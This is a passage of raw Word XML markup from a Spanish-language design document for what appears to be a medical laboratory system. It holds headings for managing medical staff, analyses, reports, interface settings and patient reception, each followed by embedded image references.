    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D3A81">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0CF769" wp14:editId="687C3CD3">
            <wp:extent cx="5612130" cy="3254879"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="1374650457" name="Imagen 137465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3254879"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D3A81">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01366803" wp14:editId="1F40EA26">
            <wp:extent cx="6133759" cy="2352675"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="1374650459" name="Imagen 137465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36331" cy="2353662"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="009D0BAC" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="66" w:name="_Toc454371326"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar plantel me</w:t>
      </w:r>
      <w:r w:rsidR="001B08E6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>dico</w:t>
      </w:r>
      <w:bookmarkEnd w:id="66"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070C3F">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="186369FB" wp14:editId="38E58DAD">
            <wp:extent cx="6130693" cy="2533650"/>
            <wp:effectExtent l="0" t="0" r="381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32659" cy="2534463"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00070C3F">
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:noProof/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5978EC9E" wp14:editId="0F1A4590">
            <wp:extent cx="5639798" cy="322897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3943" cy="3231348"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc454371327"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Gestionar análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="002C54B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7DEB68D2" wp14:editId="4B213361">
            <wp:extent cx="5612130" cy="3027195"/>
            <wp:effectExtent l="0" t="0" r="762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3027195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="002C54B0">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53BCEA14" wp14:editId="116CD2F1">
            <wp:extent cx="5612130" cy="2539147"/>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2539147"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6"/>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
      </w:pPr>
      <w:bookmarkStart w:id="68" w:name="_Toc454371328"/>
      <w:r w:rsidRPr="00851A08">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Parametrización de </w:t>
      </w:r>
      <w:r w:rsidRPr="005472F6">
        <w:t>análisis</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00354531">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16E51A94" wp14:editId="6E396DFD">
            <wp:extent cx="5896040" cy="3248167"/>
            <wp:effectExtent l="0" t="0" r="0"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1106" cy="3250958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="003D46C5" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:r w:rsidRPr="00354531">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C3D7507" wp14:editId="4CBF5998">
            <wp:extent cx="5911450" cy="3534770"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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15367" cy="3537112"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6"/>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="009D0BAC" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc454371329"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Generar r</w:t>
      </w:r>
      <w:r w:rsidR="001B08E6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>eportes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:r w:rsidR="001B08E6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F57DBB">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63DD0411" wp14:editId="30F1F6F0">
            <wp:extent cx="6066794" cy="330517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68770" cy="3306252"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00F57DBB" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AC1B12">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D9B2B34" wp14:editId="54D557CF">
            <wp:extent cx="6048375" cy="3009809"/>
            <wp:effectExtent l="0" t="0" r="0" b="6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53577" cy="3012397"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc454371330"/>
      <w:r w:rsidRPr="00851A08">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Personalizar interfaz</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4791D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17968BF3" wp14:editId="0583A466">
            <wp:extent cx="5495925" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>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95925" cy="3990975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F4791D">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26469C99" wp14:editId="7DF24E41">
            <wp:extent cx="3390900" cy="1619250"/>
            <wp:effectExtent l="0" t="0" r="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90900" cy="1619250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="majorBidi"/>
          <w:color w:val="1A495D" w:themeColor="accent1" w:themeShade="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc454371331"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recepción de pacientes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D121AD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53B1080D" wp14:editId="498EBF0D">
            <wp:extent cx="5612130" cy="3325707"/>
            <wp:effectExtent l="0" t="0" r="7620" b="8255"/>
            <wp:docPr id="1374650450" name="Imagen 137465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3325707"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D121AD">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="es-BO" w:eastAsia="es-BO"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="044437E2" wp14:editId="48208AA1">
            <wp:extent cx="5612130" cy="2596542"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="1374650452" name="Imagen 137465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2596542"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FC5AAE" w:rsidRDefault="00FC5AAE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="398E98" w:themeColor="accent2" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc422314681"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="004154DB" w:rsidRDefault="001B08E6" w:rsidP="00FC5AAE">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc454371332"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Análisis de Paquetes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00A314B9" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:lang w:val="es-BO"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001B08E6" w:rsidRPr="00851A08" w:rsidRDefault="001B08E6" w:rsidP="001B08E6">
      <w:pPr>
        <w:pStyle w:val="Titulo4"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A314B9">
        <w:rPr>
          <w:noProof/>
